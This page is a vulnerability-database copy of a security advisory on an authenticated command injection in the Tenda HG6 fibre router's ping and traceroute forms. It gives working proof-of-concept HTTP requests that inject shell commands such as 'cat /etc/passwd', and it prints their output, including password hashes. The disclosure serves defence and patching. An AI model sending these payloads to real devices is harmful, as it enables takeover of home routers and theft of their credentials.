Vulners
Lucene search
Tenda HG6 v3.3.0 Remote Command Injection Vulnerability
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | CVE-2022-30425 | 2 Jun 202214:15 | – | attackerkb |
 | CVE-2022-30425 | 12 Mar 202621:02 | – | circl |
 | Tenda HG6 操作系统命令注入漏洞 | 2 Jun 202200:00 | – | cnnvd |
 | Tenda HG6 Command Injection Vulnerability | 9 Jun 202200:00 | – | cnvd |
 | CVE-2022-30425 | 27 May 202212:56 | – | cve |
 | CVE-2022-30425 | 27 May 202212:56 | – | cvelist |
 | CVE-2022-30425 | 2 Jun 202214:15 | – | nvd |
 | Command injection | 2 Jun 202214:15 | – | prion |
 | CVE-2022-30425 | 22 May 202522:49 | – | redhatcve |
 | VulnCheck KEV: CVE-2022-30425 | 11 Mar 202600:00 | – | vulncheck_kev |
10
<html><body><p>Tenda HG6 v3.3.0 Remote Command Injection Vulnerability
Vendor: Tenda Technology Co.,Ltd.
Product web page: https://www.tendacn.com
https://www.tendacn.com/product/HG6.html
Affected version: Firmware version: 3.3.0-210926
Software version: v1.1.0
Hardware Version: v1.0
Check Version: TD_HG6_XPON_TDE_ISP
Summary: HG6 is an intelligent routing passive optical network
terminal in Tenda FTTH solution. HG6 provides 4 LAN ports(1*GE,3*FE),
a voice port to meet users' requirements for enjoying the Internet,
HD IPTV and VoIP multi-service applications.
Desc: The application suffers from an authenticated OS command injection
vulnerability. This can be exploited to inject and execute arbitrary
shell commands through the 'pingAddr' and 'traceAddr' HTTP POST parameters
in formPing, formPing6, formTracert and formTracert6 interfaces.
Tested on: Boa/0.93.15
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2022-5706
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5706.php
22.04.2022
--
ping.asp:
---------
POST /boaform/formPing HTTP/1.1
Host: 192.168.1.1
pingAddr=;ls /etc&wanif=65535&submit-url=/ping.asp&postSecurityFlag=2564
---
TZ
app.gwdt
bftpd.conf
buildtime
check_version.txt
config
config.csv
config_default.xml
config_default_hs.xml
dhclient-script
dnsmasq.conf
ethertypes
factory_default.xml
ftpdpassword
group
hardversion
inetd.conf
init.d
inittab
innversion
insdrv.sh
irf
mdev.conf
omci_custom_opt.conf
omci_ignore_mib_tbl.conf
omci_ignore_mib_tbl_10g.conf
omci_mib.cfg
orf
passwd
ppp
profile
protocols
radvd.conf
ramfs.img
rc_boot_dsp
rc_voip
release_date
resolv.conf
rtk_tr142.sh
run_customized_sdk.sh
runoam.sh
runomci.sh
runsdk.sh
samba
scripts
services
setprmt_reject
shells
simplecfgservice.xml
smb.conf
softversion
solar.conf
solar.conf.in
ssl_cert.pem
ssl_key.pem
version
wscd.conf
ping6.asp:
----------
POST /boaform/formPing6 HTTP/1.1
Host: 192.168.1.1
pingAddr=;ls&wanif=65535&go=Go&submit-url=/ping6.asp
---
boa.conf
web
tracert.asp:
------------
POST /boaform/formTracert HTTP/1.1
Host: 192.168.1.1
traceAddr=;pwd&trys=1&timeout=5&datasize=38&dscp=0&maxhop=10&go=Go&submit-url=/tracert.asp
---
/home/httpd
tracert6.asp:
-------------
POST /boaform/formTracert6 HTTP/1.1
Host: 192.168.1.1
traceAddr=;cat /etc/passwd&trys=1&timeout=5&datasize=38&maxhop=10&go=Go&submit-url=/tracert6.asp
---
admin:$1$$CoERg7ynjYLsj2j4glJ34.:0:0::/tmp:/bin/sh
adsl:$1$$m9g7v7tSyWPyjvelclu6D1:0:0::/tmp:/bin/sh
nobody:x:0:0::/tmp:/dev/null
user:$1$$ex9cQFo.PV11eSLXJFZuj.:1:0::/tmp:/bin/sh
</p></body></html>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 May 2022 00:00Current
7.6High risk
Vulners AI Score7.6
CVSS 3.18.8
CVSS 29
EPSS0.18925